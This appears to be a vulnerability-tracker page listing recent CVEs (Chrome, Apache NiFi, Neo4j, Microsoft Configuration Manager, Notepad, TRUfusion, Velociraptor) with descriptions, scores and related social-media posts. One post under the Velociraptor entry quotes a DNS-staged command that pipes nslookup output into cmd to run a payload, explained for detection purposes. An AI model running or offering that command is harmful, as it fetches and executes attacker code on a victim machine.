Overview

  • Google
  • Chrome

13 Feb 2026
Published
14 Feb 2026
Updated

CVSS
Pending
EPSS
0.03%

Description

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Statistics

  • 6 Posts

Last activity: 5 hours ago

Fediverse

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

  • 0
  • 0
  • 0
  • 10h ago

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

  • 0
  • 0
  • 0
  • 16h ago

Bluesky

> Release 1.109.4: fix: backport for CVE-2026-2441 from chromium (#295561) · microsoft/vscode https://github.com/microsoft/vscode/releases/tag/1.109.4
  • 0
  • 0
  • 0
  • 22h ago
New Chrome Zero-Day (CVE-2026-2441) Under Active Attack — Patch Released URL: nvd.nist.gov/vuln/detail/... Classification: Critical, Solution: Official Fix, Exploit Maturity: Functional, CVSSv3.1: 8.8
  • 0
  • 0
  • 0
  • 12h ago
Chrome: first zero-day of 2026, already exploited in attacks, fixed. Google has fixed CVE-2026-2441, the first Chrome zero-day of 2026 already exploited. A use-... flaw https://www.ilsoftware.it/chrome-corretto-il-primo-zero-day-2026-gia-sfruttato-in-attacchi/
  • 0
  • 0
  • 0
  • 9h ago
🚨 Update Chrome NOW 🛎️ New Chrome Zero-Day (CVE-2026-2441) Under Active Attack — Patch Released thehackernews.com/2026/02/new-...
  • 0
  • 0
  • 0
  • 5h ago

Overview

  • Apache Software Foundation
  • Apache NiFi
  • org.apache.nifi:nifi-web-api

17 Feb 2026
Published
17 Feb 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
0.03%

KEV

Description

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a component previously added. The missing authorization requires a more privileged user to add a restricted component to the flow configuration, but permits a less privileged user to make property configuration changes. Apache NiFi installations that do not implement different levels of authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.8.0 is the recommended mitigation.

Statistics

  • 2 Posts

Last activity: 7 hours ago

Fediverse

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 9h ago

Bluesky

🚨 CVE-2026-25903 – Apache NiFi Missing authorization in Apache NiFi (1.1.0–2.7.2) allows less privileged users to modify properties of Restricted components. CVSS: 8.7 (HIGH) Full analysis: basefortify.eu/cve_reports/... #CVE #ApacheNiFi #CyberSecurity #Vulnerability #InfoSec
  • 0
  • 0
  • 0
  • 7h ago

Overview

  • neo4j
  • Enterprise Edition

04 Feb 2026
Published
04 Feb 2026
Updated

CVSS v4.0
MEDIUM (4.8)
EPSS
0.00%

KEV

Description

Neo4j Enterprise and Community editions versions prior to 2026.01.3 and 5.26.21 are vulnerable to a potential information disclosure by a user who has ability to access the local log files. The "obfuscate_literals" option in the query logs does not redact error information, exposing unredacted data in the query log when a customer writes a query that fails. It can allow a user with legitimate access to the local log files to obtain information they are not authorised to see. If this user is also in a position to run queries and trigger errors, this vulnerability can potentially help them to infer information they are not authorised to see through their intended database access. We recommend upgrading to versions 2026.01.3 (or 5.26.21) where the issue is fixed, and reviewing query log files permissions to ensure restricted access. If your configuration had db.logs.query.obfuscate_literals enabled, and you wish the obfuscation to cover the error messages as well, you need to enable the new configuration setting db.logs.query.obfuscate_errors once you have upgraded Neo4j.

Statistics

  • 2 Posts

Last activity: 20 hours ago

Bluesky

[release-25.11] neo4j: 5.26.1 -> 5.26.21, fixes CVE-2026-1622 https://github.com/NixOS/nixpkgs/pull/491149 #security
  • 0
  • 0
  • 0
  • 22h ago
#491151 google-alloydb-auth-proxy: 1.13.10 -> 1.13.11 #491149 [release-25.11] neo4j: 5.26.1 -> 5.26.21, fixes CVE-2026-1622 #491143 terraform-providers.oracle_oci: 8.0.0 -> 8.1.0 #491141 redu: add drdo as maintainer #491138 Firefox: 147.0.3 -> 147.0.4
  • 0
  • 0
  • 0
  • 20h ago

Overview

  • Microsoft
  • Microsoft Configuration Manager

08 Oct 2024
Published
12 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
87.46%

Description

Microsoft Configuration Manager Remote Code Execution Vulnerability

Statistics

  • 1 Post
  • 15 Interactions

Last activity: 8 hours ago

Fediverse

Microsoft: Year-and-a-half-old vulnerability is under attack

In October 2024, Microsoft (MS) patched a security hole that was rated with a risk of 9.8 out of 10. Or should we say: backdoor? The vulnerability CVE-2024-43468 consists of insufficient validation and sanitization of user input. That is to say: anyone who knows the "right" input values can execute code remotely and without authorization (RCE, the worst-case scenario among security vulnerabilities). Updates against this backdoor must be installed immediately - and have needed to be for a year and a half! CVE-2024-43468 has just been added to the catalog of known exploited vulnerabilities (KEV)

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

  • 9
  • 6
  • 0
  • 8h ago

Overview

  • Microsoft
  • Windows Notepad

10 Feb 2026
Published
17 Feb 2026
Updated

CVSS v3.1
HIGH (7.8)
EPSS
0.08%

KEV

Description

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code locally.

Statistics

  • 1 Post
  • 6 Interactions

Last activity: 14 hours ago

Bluesky

Microsoft adds not only unnecessary AI features to Windows Notepad, but even a remote code execution vulnerability | XenoSpectrum https://xenospectrum.com/windows-notepad-vulnerability-cve-2026-20841-ai-markdown/
  • 2
  • 4
  • 0
  • 14h ago

Overview

  • Pending

17 Feb 2026
Published
17 Feb 2026
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.

Statistics

  • 2 Posts
  • 4 Interactions

Last activity: 12 hours ago

Fediverse

[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793)

https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
  • 1
  • 2
  • 0
  • 12h ago

Bluesky

[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793) www.rcesecurity.com -> Original->
  • 0
  • 1
  • 0
  • 12h ago

Overview

  • Pending

17 Feb 2026
Published
17 Feb 2026
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Rocket TRUfusion Enterprise through 7.10.5 exposes the endpoint at /axis2/services/WsPortalV6UpDwAxis2Impl to authenticated users to be able to upload files. However, the application doesn't properly sanitize the jobDirectory parameter, which allows path traversal sequences to be included. This allows writing files to arbitrary local filesystem locations and may subsequently lead to remote code execution.

Statistics

  • 2 Posts
  • 4 Interactions

Last activity: 12 hours ago

Fediverse

[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793)

https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
  • 1
  • 2
  • 0
  • 12h ago

Bluesky

[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793) www.rcesecurity.com -> Original->
  • 0
  • 1
  • 0
  • 12h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 3 hours ago

Bluesky

URGENT: #Ubuntu 24.04 LTS kernel updates (USN-8028-3) are live. Critical patches for AMD CPU data leaks (CVE-2024-36351) and SEV-SNP guest memory overwrite flaws. Read more: 👉 tinyurl.com/53wmvedk #Security
  • 0
  • 2
  • 0
  • 3h ago

Overview

  • Rapid7
  • Velociraptor

20 Jun 2025
Published
28 Nov 2025
Updated

CVSS v3.1
MEDIUM (5.5)
EPSS
0.06%

KEV

Description

Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifacts, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator" role).

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 12 hours ago

Fediverse

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable; they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

  • 0
  • 2
  • 0
  • 12h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 2 Posts

Last activity: 5 hours ago

Fediverse

Old vuln, new life: React2Shell (CVE-2025-55812) is seeing a surge in active exploitation with reverse shells + cryptominers.

If your patching is based on CVSS instead of real-world activity, you’re already behind.

cybersecuritydive.com/news/rea

  • 0
  • 0
  • 1
  • 5h ago